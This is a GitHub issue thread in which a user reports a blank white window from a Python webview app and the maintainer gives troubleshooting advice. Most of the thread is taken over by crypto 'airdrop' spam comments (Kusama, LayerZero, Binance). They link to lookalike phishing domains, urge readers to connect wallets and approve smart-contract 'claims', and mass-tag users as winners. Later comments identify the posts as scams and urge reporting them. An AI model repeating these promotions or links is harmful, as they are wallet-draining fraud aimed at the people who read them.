### ISSUE TITLE
White window

### ISSUE THREAD

**Issue by GoldenMelky** [thewh1teagle/happy#1]
There's just a white window when i do "`python3 ./app.py`" 
![image](https://github.com/thewh1teagle/happy/assets/83531180/7f77a367-3956-47e4-9c4f-2c121ad55124)
if i do ^C it shows:

```
Traceback (most recent call last):
  File "/home/golden/.local/lib/python3.11/site-packages/webview/platforms/qt.py", line 530, in eventFilter
    def eventFilter(self, object, event):

KeyboardInterrupt
```
using Kubuntu 23.04

**Comment by thewh1teagle** [comment]
You need to build the `ui` too.
I updated the README in python folder see
https://github.com/thewh1teagle/happy/blob/main/python/README.md

In addition I havn't tested any code from this repo on linux but it should work

**Comment by GoldenMelky** [comment]
now it works, thanks

**Comment by GoldenMelky** [comment]
i tried it but it's still not working

**Comment by prezo-ci-bkp** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by thewh1teagle** [comment]
You can try right clicking and see the console for logs and attach here.
or try on windows, or try the Rust version.

**Comment by rajasekar-work** [comment]
### LayerZero Airdrop Guide: BIGGEST Airdrop in 2023 ($ZRO Token Confirmed) 🪂

LayerZero is one of the most ANTICIPATED airdrops in 2023, and users can potentially earn up to $10,000 in airdrop rewards! This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Claim Now on Layerzero Oficial](http://link.layerzer0network.online/rFz335)

![Claim Now](https://i.ytimg.com/vi/s7BR96pg0SA/sddefault.jpg)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).
   - 
2. **Share on Social Media:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&title=LayerZero+Airdrop+Guide) 

2. **Eligibility Check:**
   - Confirm your eligibility for the Layerzero Airdrop.

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by tim-tepia** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Jerem-K, @fernandogarzaaa, @liulangwa, @dyxushuai, @IgorAssuncao, @hacpy, @liwenlang, @wrightcohen, @rwilliams251, @EldersJavas, @Smokeyz76, @sinanyucetepe, @UtkuX, @techieanant, @nikanjuri, @guanzo, @lpsm-dev, @Roybitsir, @willin, @tuif, @oonursrc, @zikzakio, @furaingudakku, @frostmark, @Str4ken, @Nero-F, @JestDotty, @nothing0012, @ibaddesmukh, @desdeux, @hxjovi, @ssp6, @shide1989, @lyndonm, @mustafakibar, @oldtune, @droidizer-hf, @awalo666, @Adambrb, @inkbx, @lyknice23, @WilliamLAllen, @eupn, @kumarc-123, @yaoting10, @obulpathi, @araguaci, @kootsZhin, @nobody1409, @Ayse1006

**Comment by guanzo** [comment]
crypto scams have reached github... jesus

**Comment by thewh1teagle** [comment]
@guanzo 
Please report to github

![image](https://github.com/thewh1teagle/happy/assets/61390950/083fdea1-5c46-451a-8e45-259c432fa696)

**Comment by eupn** [comment]
@thewh1teagle I think this is only available to maintainers

<img width="219" alt="image" src="https://github.com/thewh1teagle/happy/assets/36292692/ac3dab42-a459-457c-90a6-63ba3c45c724">

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @b1zzu, @WHMyyds, @cr4ftx, @emsd1981, @ernest33, @zMoooooritz, @Alarg, @LuizFeSantana, @Elguajo, @alex-bacart, @bloomylife, @theitman724, @AydenGen, @lebin, @johanbacks, @yy404, @roscisz, @iipoter, @adrianlmcleod, @rmedeiros, @TechStudent10, @bvidosits, @mikolajpp, @trapcodeio, @kurataki-git, @sl8rw, @pleytens, @grayguest, @Risyandi, @AlexOliveira-Ipira, @lajbel, @WieeRd, @constanedes, @ivanfretes, @thkuo, @xbdmHQ, @shouyong, @cfdev, @MambaBoyy, @JMDesros, @oulaly, @Vade86, @buster-blue, @geekapp2019, @cisbest, @shanefontaine, @elianiva, @EdgarVaguencia, @linx1337, @LinkXSystem

**Comment by Makitoid** [comment]
> # Binance Airdrop Guide: Claim Your $1500 in BNB Now!
> 🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!
> 
> [![Claim Now](https://camo.githubusercontent.com/8251fc1c02ddbd7f2cc0237f6f10fd031056cd108a8e1670d762a6e77f6aa79b/68747470733a2f2f692e7974696d672e636f6d2f76692f50466847447958737461732f6d617872657364656661756c742e6a7067)](http://link.bnbreward.online/0mhPJ2)
> 
> ## Steps to Claim:
> ### 1. 🌐 Connect Your Binance Wallet:
> * Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
> * Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
> 
> ### 2. 🔄 Interact with the Contract:
> * Once your wallet is connected.
> * Click on the "**Claim**" button to interact with the smart contract.
> 
> 💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!
> 
> Winners: @b1zzu, @WHMyyds, @cr4ftx, @emsd1981, @ernest33, @zMoooooritz, @Alarg, @LuizFeSantana, @Elguajo, @alex-bacart, @bloomylife, @theitman724, @AydenGen, @lebin, @johanbacks, @yy404, @roscisz, @iipoter, @adrianlmcleod, @rmedeiros, @TechStudent10, @bvidosits, @mikolajpp, @trapcodeio, @kurataki-git, @sl8rw, @pleytens, @grayguest, @Risyandi, @AlexOliveira-Ipira, @lajbel, @WieeRd, @constanedes, @ivanfretes, @thkuo, @xbdmHQ, @shouyong, @cfdev, @MambaBoyy, @JMDesros, @oulaly, @Vade86, @buster-blue, @geekapp2019, @cisbest, @shanefontaine, @elianiva, @EdgarVaguencia, @linx1337, @LinkXSystem

What`s this?

**Comment by WieeRd** [comment]
By quoting that entire ad I got mentioned yet again.
Please just report and ignore that obvious scam.

**Comment by TechStudent10** [comment]
Crypto scams on GitHub holy crap...

**Comment by thewh1teagle** [comment]
Guys you have the power to stop this scammers
Please reports the user
And send email to

support@github.com

**Comment by shide1989** [comment]
reported

**Comment by WHMyyds** [comment]
愚蠢，太愚蠢了
